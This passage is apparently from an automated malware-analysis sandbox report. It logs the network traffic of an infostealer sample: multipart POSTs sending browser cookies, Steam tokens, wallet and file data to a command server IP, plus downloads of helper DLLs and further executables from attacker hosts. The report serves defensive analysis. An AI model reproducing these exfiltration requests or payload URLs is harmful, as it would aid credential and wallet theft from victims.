73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 79 35 30 65 48 51 3d 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 45 42 4b 4a 4a 44 47 48 43 42 47 43 41 41 4b 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 65 79 4a 70 5a 43 49 36 4d 53 77 69 63 6d 56 7a 64 57 78 30 49 6a 70 37 49 6d 4e 76 62 32 74 70 5a 58 4d 69 4f 6c 74 64 66 58 30 3d 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 45 42 4b 4a 4a 44 47 48 43 42 47 43 41 41 4b 45 48 44 2d 2d 0d 0a Data Ascii: ------KKEBKJJDGHCBGCAAKEHDContent-Disposition: form-data; name="token"cf4a93bd48aeae97828646edccb167b61e7d43af4406af9748e8b0bdf623d35f52a86479------KKEBKJJDGHCBGCAAKEHDContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lXy50eHQ=------KKEBKJJDGHCBGCAAKEHDContent-Disposition: form-data; name="file"eyJpZCI6MSwicmVzdWx0Ijp7ImNvb2tpZXMiOltdfX0=------KKEBKJJDGHCBGCAAKEHD--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CGCAKKKEGCAKJKFIIEGIHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 47 43 41 4b 4b 4b 45 47 43 41 4b 4a 4b 46 49 49 45 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 66 34 61 39 33 62 64 34 38 61 65 61 65 39 37 38 32 38 36 34 36 65 64 63 63 62 31 36 37 62 36 31 65 37 64 34 33 61 66 34 34 30 36 61 66 39 37 34 38 65 38 62 30 62 64 66 36 32 33 64 33 35 66 35 32 61 38 36 34 37 39 0d 0a 2d 2d 2d 2d 2d 2d 43 47 43 41 4b 4b 4b 45 47 43 41 4b 4a 4b 46 49 49 45 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 43 47 43 41 4b 4b 4b 45 47 43 41 4b 4a 4b 46 49 49 45 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 43 47 43 41 4b 4b 4b 45 47 43 41 4b 4a 4b 46 49 49 45 47 49 2d 2d 0d 0a Data Ascii: ------CGCAKKKEGCAKJKFIIEGIContent-Disposition: form-data; name="token"cf4a93bd48aeae97828646edccb167b61e7d43af4406af9748e8b0bdf623d35f52a86479------CGCAKKKEGCAKJKFIIEGIContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------CGCAKKKEGCAKJKFIIEGIContent-Disposition: form-data; name="file"------CGCAKKKEGCAKJKFIIEGI--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DGHIDAFCGIEHIEBFCFBAHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 47 48 49 44 41 46 43 47 49 45 48 49 45 42 46 43 46 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 66 34 61 39 33 62 64 34 38 61 65 61 65 39 37 38 32 38 36 34 36 65 64 63 63 62 31 36 37 62 36 31 65 37 64 34 33 61 66 34 34 30 36 61 66 39 37 34 38 65 38 62 30 62 64 66 36 32 33 64 33 35 66 35 32 61 38 36 34 37 39 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 49 44 41 46 43 47 49 45 48 49 45 42 46 43 46 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 49 44 41 46 43 47 49 45 48 49 45 42 46 43 46 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 49 44 41 46 43 47 49 45 48 49 45 42 46 43 46 42 41 2d 2d 0d 0a Data Ascii: ------DGHIDAFCGIEHIEBFCFBAContent-Disposition: form-data; name="token"cf4a93bd48aeae97828646edccb167b61e7d43af4406af9748e8b0bdf623d35f52a86479------DGHIDAFCGIEHIEBFCFBAContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------DGHIDAFCGIEHIEBFCFBAContent-Disposition: form-data; name="file"------DGHIDAFCGIEHIEBFCFBA--
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/freebl3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/mozglue.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/msvcp140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/nss3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/softokn3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CGDGIJKFIJDAAAKFHIEGHost: 185.215.113.206Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KKKJEHCGCGDAAAKFHJKJHost: 185.215.113.206Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4b 4b 4a 45 48 43 47 43 47 44 41 41 41 4b 46 48 4a 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 66 34 61 39 33 62 64 34 38 61 65 61 65 39 37 38 32 38 36 34 36 65 64 63 63 62 31 36 37 62 36 31 65 37 64 34 33 61 66 34 34 30 36 61 66 39 37 34 38 65 38 62 30 62 64 66 36 32 33 64 33 35 66 35 32 61 38 36 34 37 39 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4b 4a 45 48 43 47 43 47 44 41 41 41 4b 46 48 4a 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4b 4a 45 48 43 47 43 47 44 41 41 41 4b 46 48 4a 4b 4a 2d 2d 0d 0a Data Ascii: ------KKKJEHCGCGDAAAKFHJKJContent-Disposition: form-data; name="token"cf4a93bd48aeae97828646edccb167b61e7d43af4406af9748e8b0bdf623d35f52a86479------KKKJEHCGCGDAAAKFHJKJContent-Disposition: form-data; name="message"wallets------KKKJEHCGCGDAAAKFHJKJ--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECBGHCGCBKFIECBFHIDGHost: 185.215.113.206Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 43 42 47 48 43 47 43 42 4b 46 49 45 43 42 46 48 49 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 66 34 61 39 33 62 64 34 38 61 65 61 65 39 37 38 32 38 36 34 36 65 64 63 63 62 31 36 37 62 36 31 65 37 64 34 33 61 66 34 34 30 36 61 66 39 37 34 38 65 38 62 30 62 64 66 36 32 33 64 33 35 66 35 32 61 38 36 34 37 39 0d 0a 2d 2d 2d 2d 2d 2d 45 43 42 47 48 43 47 43 42 4b 46 49 45 43 42 46 48 49 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 45 43 42 47 48 43 47 43 42 4b 46 49 45 43 42 46 48 49 44 47 2d 2d 0d 0a Data Ascii: ------ECBGHCGCBKFIECBFHIDGContent-Disposition: form-data; name="token"cf4a93bd48aeae97828646edccb167b61e7d43af4406af9748e8b0bdf623d35f52a86479------ECBGHCGCBKFIECBFHIDGContent-Disposition: form-data; name="message"files------ECBGHCGCBKFIECBFHIDG--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJJJEBGDAFHJEBGDGIJDHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4a 4a 4a 45 42 47 44 41 46 48 4a 45 42 47 44 47 49 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 66 34 61 39 33 62 64 34 38 61 65 61 65 39 37 38 32 38 36 34 36 65 64 63 63 62 31 36 37 62 36 31 65 37 64 34 33 61 66 34 34 30 36 61 66 39 37 34 38 65 38 62 30 62 64 66 36 32 33 64 33 35 66 35 32 61 38 36 34 37 39 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 4a 45 42 47 44 41 46 48 4a 45 42 47 44 47 49 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 4a 45 42 47 44 41 46 48 4a 45 42 47 44 47 49 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 4a 45 42 47 44 41 46 48 4a 45 42 47 44 47 49 4a 44 2d 2d 0d 0a Data Ascii: ------JJJJEBGDAFHJEBGDGIJDContent-Disposition: form-data; name="token"cf4a93bd48aeae97828646edccb167b61e7d43af4406af9748e8b0bdf623d35f52a86479------JJJJEBGDAFHJEBGDGIJDContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------JJJJEBGDAFHJEBGDGIJDContent-Disposition: form-data; name="file"------JJJJEBGDAFHJEBGDGIJD--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJJKEBGHJKFIDGCAAFCAHost: 185.215.113.206Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4a 4a 4b 45 42 47 48 4a 4b 46 49 44 47 43 41 41 46 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 66 34 61 39 33 62 64 34 38 61 65 61 65 39 37 38 32 38 36 34 36 65 64 63 63 62 31 36 37 62 36 31 65 37 64 34 33 61 66 34 34 30 36 61 66 39 37 34 38 65 38 62 30 62 64 66 36 32 33 64 33 35 66 35 32 61 38 36 34 37 39 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4a 4b 45 42 47 48 4a 4b 46 49 44 47 43 41 41 46 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4a 4b 45 42 47 48 4a 4b 46 49 44 47 43 41 41 46 43 41 2d 2d 0d 0a Data Ascii: ------KJJKEBGHJKFIDGCAAFCAContent-Disposition: form-data; name="token"cf4a93bd48aeae97828646edccb167b61e7d43af4406af9748e8b0bdf623d35f52a86479------KJJKEBGHJKFIDGCAAFCAContent-Disposition: form-data; name="message"ybncbhylepme------KJJKEBGHJKFIDGCAAFCA--
Source: global traffic HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FCFHJKJJJECGDHJJDHDAHost: 185.215.113.206Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 43 46 48 4a 4b 4a 4a 4a 45 43 47 44 48 4a 4a 44 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 66 34 61 39 33 62 64 34 38 61 65 61 65 39 37 38 32 38 36 34 36 65 64 63 63 62 31 36 37 62 36 31 65 37 64 34 33 61 66 34 34 30 36 61 66 39 37 34 38 65 38 62 30 62 64 66 36 32 33 64 33 35 66 35 32 61 38 36 34 37 39 0d 0a 2d 2d 2d 2d 2d 2d 46 43 46 48 4a 4b 4a 4a 4a 45 43 47 44 48 4a 4a 44 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 46 43 46 48 4a 4b 4a 4a 4a 45 43 47 44 48 4a 4a 44 48 44 41 2d 2d 0d 0a Data Ascii: ------FCFHJKJJJECGDHJJDHDAContent-Disposition: form-data; name="token"cf4a93bd48aeae97828646edccb167b61e7d43af4406af9748e8b0bdf623d35f52a86479------FCFHJKJJJECGDHJJDHDAContent-Disposition: form-data; name="message"wkkjqaiaxkhb------FCFHJKJJJECGDHJJDHDA--
Source: Joe Sandbox View IP Address: 185.215.113.43 185.215.113.43
Source: Joe Sandbox View IP Address: 172.67.199.72 172.67.199.72
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: Joe Sandbox View JA3 fingerprint: 1138de370e523e824bbca92d049a3777
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49707 -> 172.67.199.72:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49713 -> 172.67.199.72:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49710 -> 172.67.199.72:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49709 -> 172.67.199.72:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49716 -> 172.67.199.72:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49708 -> 172.67.199.72:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49705 -> 172.67.199.72:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49706 -> 172.67.199.72:443
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.9:49718 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.9:49747 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.9:49719 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.9:49780 -> 185.215.113.16:80
Source: unknown HTTPS traffic detected: 23.206.229.209:443 -> 192.168.2.9:49743 version: TLS 1.0
Source: unknown TCP traffic detected without corresponding DNS query: 23.206.229.209
Source: unknown TCP traffic detected without corresponding DNS query: 23.206.229.209
Source: unknown TCP traffic detected without corresponding DNS query: 23.206.229.209
Source: unknown TCP traffic detected without corresponding DNS query: 20.189.173.11
Source: unknown TCP traffic detected without corresponding DNS query: 23.206.229.209
Source: unknown TCP traffic detected without corresponding DNS query: 23.206.229.209
Source: unknown TCP traffic detected without corresponding DNS query: 23.206.229.209
Source: unknown TCP traffic detected without corresponding DNS query: 23.206.229.209
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe Code function: 6_2_6CB7CC60 PR_Recv, 6_2_6CB7CC60
Source: global traffic HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIu2yQEIo7bJAQipncoBCNT9ygEIlKHLAQiFoM0BCNy9zQEIucrNAQip0c0BCInTzQEIqdXNAQjJ1s0BCPTWzQEIqNjNAQj5wNQVGOmYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIu2yQEIo7bJAQipncoBCNT9ygEIlKHLAQiFoM0BCNy9zQEIucrNAQip0c0BCInTzQEIqdXNAQjJ1s0BCPTWzQEIqNjNAQj5wNQVGOmYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/sqlite3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/freebl3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/mozglue.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/msvcp140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/nss3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/softokn3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
Source: global traffic DNS traffic detected: DNS query: observerfry.lat
Source: global traffic DNS traffic detected: DNS query: www.google.com
Source: unknown HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: observerfry.lat
Source: ElmEHL9kP9.exe, 00000000.00000003.1798335605.00000000010F8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/
Source: ElmEHL9kP9.exe, 00000000.00000003.1798335605.00000000010F8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/6
Source: ElmEHL9kP9.exe, 00000000.00000003.1798335605.00000000010F8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/=
Source: KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe, 00000006.00000002.2491703927.000000000B8F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/mine/random.exe
Source: KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe, 00000006.00000002.2484458829.0000000001389000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/mine/random.exe)
Source: KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe, 00000006.00000002.2484458829.0000000001389000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/mine/random.exes
Source: ElmEHL9kP9.exe, 00000000.00000003.1798272326.00000000010ED000.00000004.00000020.00020000.00000000.sdmp, ElmEHL9kP9.exe, 00000000.00000003.1798380069.00000000010EE000.00000004.00000020.00020000.00000000.sdmp, ElmEHL9kP9.exe, 00000000.00000003.1798335605.00000000010F8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exe
Source: ElmEHL9kP9.exe, 00000000.00000003.1798335605.00000000010F8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exent
Source: ElmEHL9kP9.exe, 00000000.00000003.1798335605.00000000010F8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/steam/random.exe
